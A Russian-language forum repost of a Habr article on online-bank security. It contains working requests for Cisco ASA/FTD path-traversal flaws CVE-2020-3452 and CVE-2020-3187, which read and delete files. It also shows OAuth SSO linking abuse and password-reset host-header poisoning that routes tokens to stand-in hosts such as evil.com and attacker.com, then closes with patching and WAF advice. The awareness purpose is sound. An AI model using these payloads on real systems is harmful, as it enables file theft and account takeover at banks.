[Информационная безопасность] Проблемы безопасности онлайн банков
Автор
Сообщение
news_bot ®
Стаж: 6 лет 9 месяцев
Сообщений: 27286
Привет друзья!Сегодня речь пойдет о насущных проблемах безопасности банковских систем, мы разберем часто встречающиеся уязвимости и сделаем выводы на основе актуальных проблем. ВажноОпять же, автор не гарантирует вам показать как полностью защитить вашу систему от кибер угроз, лишь хочет показать на какие проблемы следует обратить ваше внимание1. SSL VPN СервисыОчень часто банки используют Cisco SSL VPN сервисы для организации удаленного доступа в свою внутреннюю сеть
Это хорошо, но.. В Cisco существуют две потенциальные уязвимости CVE-2020-3452 и CVE-2020-31871.1. CVE-2020-3452CVE-2020-3452 - это уязвимость обхода пути только для чтения в программном обеспечении Cisco ASA и FTD. Удаленный злоумышленник, не прошедший проверку подлинности, может воспользоваться этой уязвимостью, отправив специально созданный HTTP-запрос в уязвимую систему.Воспроизведение данной уязвимости очень проста для злоумышленника GET /+CSCOT+/translation-table?type=mst&textdomain=/%252bCSCOE%252b/portal_inc.lua&default-language&lang=../ HTTP/1.1
Host: Cisco-VPN
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1Ответ
Вот так мы прочитываем файлы, в которых можно найти конфиденциальную информацию.1.2. CVE-2020-3187Эксплойт может позволить злоумышленнику просмотреть или удалить произвольные файлы в целевой системеДля воспроизведения уязвимости нужно узнать дает ли /session_password.html ответ 200 curl -k -s -i https://Cisco-VPN/+CSCOE+/session_password.htmlДает результат 200? - ОтличноПопробуем удалить файл с логотипом "/+CSCOU+/csco_logo.gif"curl -k -H "Cookie: token=../+CSCOU+/csco_logo.gif" https://Cisco-VPN/+CSCOE+/session_password.htmlС VPN сервисами закончили.2. Аутентификация & OAuthРазработчики онлайн-банкинга часто допускают ошибки при реализации единого входа (SSO) на основе протокола OAuth 2.0, что может привести к перехвату учетных данных, отправленных по незащищенному протоколу, и захвату сеанса злоумышленником.ПримерGET /auth/sso/cb?code=[sso token account] HTTP/1.1
Host: bank.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Обычно в таких запросах обязательно должны стоять CSRF ключи для проверки подлинности. Но если их нет - злоумышленник может развить свою атаку.
- Регистрация аккаунта SSO
- При попытке привязать свой аккаунт SSO к банку, злоумышленник перехватывает запрос тот что в верху
- Отправляет сгенерированную ссылку жертве.
- Аккаунт SSO хакера привязан к банку жертвы.
Или например иногда некоторые механизмы позволяют перехватывать redirect_uri - тоесть обычно в нем вписывается url куда должны поступить токены для авторизации. Иногда такая защита не работает должным образом и злоумышленник подставляет свой сайт/сервер куда впоследствии перейдут токены пользователя.Захват учетной записи через сброс пароляЭксплуатацияPOST https://bank.com/reset.php HTTP/1.1
Accept: /
Content-Type: application/json
Host: evil.comилиHost: bank.com
X-Forwarded-Host: attacker.comНу или Host: target.com
Host: attacker.comПри восстановлении пороля злоумышленник должен указать email адрес жертвы и в загаловках попытаться внедрить свой хост.При успешной реализации атаки на почту пользователю придет следущее https://evil.com/reset-password.php?token=12345678-...1234-12345678901 Как мы видим сервер подставил вместо хоста банка - хост хакера. И если пользователь перейдет по ссылке, то злоумышленник получить токены для авторизации.Иногда можно не изменять хост в загаловках и поступить другим образом.POST /resetPassword
[…]
email=victim@email.com&email=attacker@email.comВ запросе видно что злоумышленник просто продублировал параметр email и указал свою почту на которую прийдет токен авторизации.ВыводПостоянно обновляйте свои службы будь то SSL VPN, или GlobalProtect.Следите за безопасностью аутентификацииТакже как совет используйте брандмауэр веб-приложений ( WAF ), чтобы предотвратить использование уязвимостей, вызванных изменениями кода.Удачи! Всего доброго.
===========
Источник:
habr.com
===========
Похожие новости:
- [Информационная безопасность, Законодательство в IT] Информационная безопасность и коммерческая тайна
- [Информационная безопасность, Мессенджеры] WhatsApp не откажется от обновления политики конфиденциальности
- [Тестирование IT-систем, Подготовка технической документации] Чек-лист тестирования требований
- [Информационная безопасность] О безопасности Сбербанка Онлайн
- [Тестирование IT-систем, IT-инфраструктура, API, DevOps] Что такое системы API Management
- [Тестирование веб-сервисов, Управление разработкой, Карьера в IT-индустрии] Экономим ресурсы и успеваем в срок: зачем подключать QA-инженера в начале работы над фичей
- [Тестирование IT-систем, Тестирование веб-сервисов, Управление разработкой] Тесты должна писать разработка (?)
- [Информационная безопасность] ТОП-3 ИБ-событий недели по версии Jet CSIRT
- [Информационная безопасность, JavaScript, Google Chrome, Браузеры] Новая утечка истории браузера через favicon
- [Информационная безопасность, Исследования и прогнозы в IT, Законодательство в IT] Почему Microsoft перестала бороться с пиратством своего ПО (перевод)
Теги для поиска: #_informatsionnaja_bezopasnost (Информационная безопасность), #_banki (банки), #_testirovanie (тестирование), #_ujazvimosti (уязвимости), #_bezopasnost_vebprilozhenij (безопасность веб-приложений), #_informatsionnaja_bezopasnost (
Информационная безопасность
)
Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Вы не можете прикреплять файлы к сообщениям
Вы не можете скачивать файлы
Текущее время: 22-Ноя 11:58
Часовой пояс: UTC + 5
| Автор | Сообщение |
|---|---|
|
news_bot ®
Стаж: 6 лет 9 месяцев |
|
 Привет друзья!Сегодня речь пойдет о насущных проблемах безопасности банковских систем, мы разберем часто встречающиеся уязвимости и сделаем выводы на основе актуальных проблем. ВажноОпять же, автор не гарантирует вам показать как полностью защитить вашу систему от кибер угроз, лишь хочет показать на какие проблемы следует обратить ваше внимание1. SSL VPN СервисыОчень часто банки используют Cisco SSL VPN сервисы для организации удаленного доступа в свою внутреннюю сеть  Это хорошо, но.. В Cisco существуют две потенциальные уязвимости CVE-2020-3452 и CVE-2020-31871.1. CVE-2020-3452CVE-2020-3452 - это уязвимость обхода пути только для чтения в программном обеспечении Cisco ASA и FTD. Удаленный злоумышленник, не прошедший проверку подлинности, может воспользоваться этой уязвимостью, отправив специально созданный HTTP-запрос в уязвимую систему.Воспроизведение данной уязвимости очень проста для злоумышленника GET /+CSCOT+/translation-table?type=mst&textdomain=/%252bCSCOE%252b/portal_inc.lua&default-language&lang=../ HTTP/1.1 Host: Cisco-VPN Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1Ответ  Вот так мы прочитываем файлы, в которых можно найти конфиденциальную информацию.1.2. CVE-2020-3187Эксплойт может позволить злоумышленнику просмотреть или удалить произвольные файлы в целевой системеДля воспроизведения уязвимости нужно узнать дает ли /session_password.html ответ 200 curl -k -s -i https://Cisco-VPN/+CSCOE+/session_password.htmlДает результат 200? - ОтличноПопробуем удалить файл с логотипом "/+CSCOU+/csco_logo.gif"curl -k -H "Cookie: token=../+CSCOU+/csco_logo.gif" https://Cisco-VPN/+CSCOE+/session_password.htmlС VPN сервисами закончили.2. Аутентификация & OAuthРазработчики онлайн-банкинга часто допускают ошибки при реализации единого входа (SSO) на основе протокола OAuth 2.0, что может привести к перехвату учетных данных, отправленных по незащищенному протоколу, и захвату сеанса злоумышленником.ПримерGET /auth/sso/cb?code=[sso token account] HTTP/1.1 Host: bank.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Обычно в таких запросах обязательно должны стоять CSRF ключи для проверки подлинности. Но если их нет - злоумышленник может развить свою атаку.
Accept: / Content-Type: application/json Host: evil.comилиHost: bank.com X-Forwarded-Host: attacker.comНу или Host: target.com Host: attacker.comПри восстановлении пороля злоумышленник должен указать email адрес жертвы и в загаловках попытаться внедрить свой хост.При успешной реализации атаки на почту пользователю придет следущее https://evil.com/reset-password.php?token=12345678-...1234-12345678901 Как мы видим сервер подставил вместо хоста банка - хост хакера. И если пользователь перейдет по ссылке, то злоумышленник получить токены для авторизации.Иногда можно не изменять хост в загаловках и поступить другим образом.POST /resetPassword […] email=victim@email.com&email=attacker@email.comВ запросе видно что злоумышленник просто продублировал параметр email и указал свою почту на которую прийдет токен авторизации.ВыводПостоянно обновляйте свои службы будь то SSL VPN, или GlobalProtect.Следите за безопасностью аутентификацииТакже как совет используйте брандмауэр веб-приложений ( WAF ), чтобы предотвратить использование уязвимостей, вызванных изменениями кода.Удачи! Всего доброго. =========== Источник: habr.com =========== Похожие новости:
Информационная безопасность ) |
|
Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Вы не можете прикреплять файлы к сообщениям
Вы не можете скачивать файлы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Вы не можете прикреплять файлы к сообщениям
Вы не можете скачивать файлы
Текущее время: 22-Ноя 11:58
Часовой пояс: UTC + 5